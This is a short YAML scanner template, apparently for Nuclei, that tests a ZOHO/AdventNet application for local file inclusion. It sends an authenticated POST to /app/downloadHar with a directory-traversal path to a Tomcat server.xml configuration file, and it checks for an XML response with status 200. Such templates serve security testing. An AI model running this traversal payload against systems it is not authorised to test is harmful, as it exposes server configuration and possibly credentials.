id: Local_file_inclusion

info:
   name: test
   author: test
   severity: low
   tags: ro_user,super_admin,admin

requests:
    - raw:
       - |
         POST /app/downloadHar HTTP/1.1
         Host: {{Hostname}}
         Accept: application/json; version=2.0
         Authorization: Zoho-oauthtoken {{access_token}}

         ../../../../../../../../../../../../../home/sas/dad/AdventNet/Sas/tomcat/conf/server.xml

      matchers-condition: and
      matchers:
        - type: word
          words:
            - "xml version"
        - type: status
          status:
             - 200
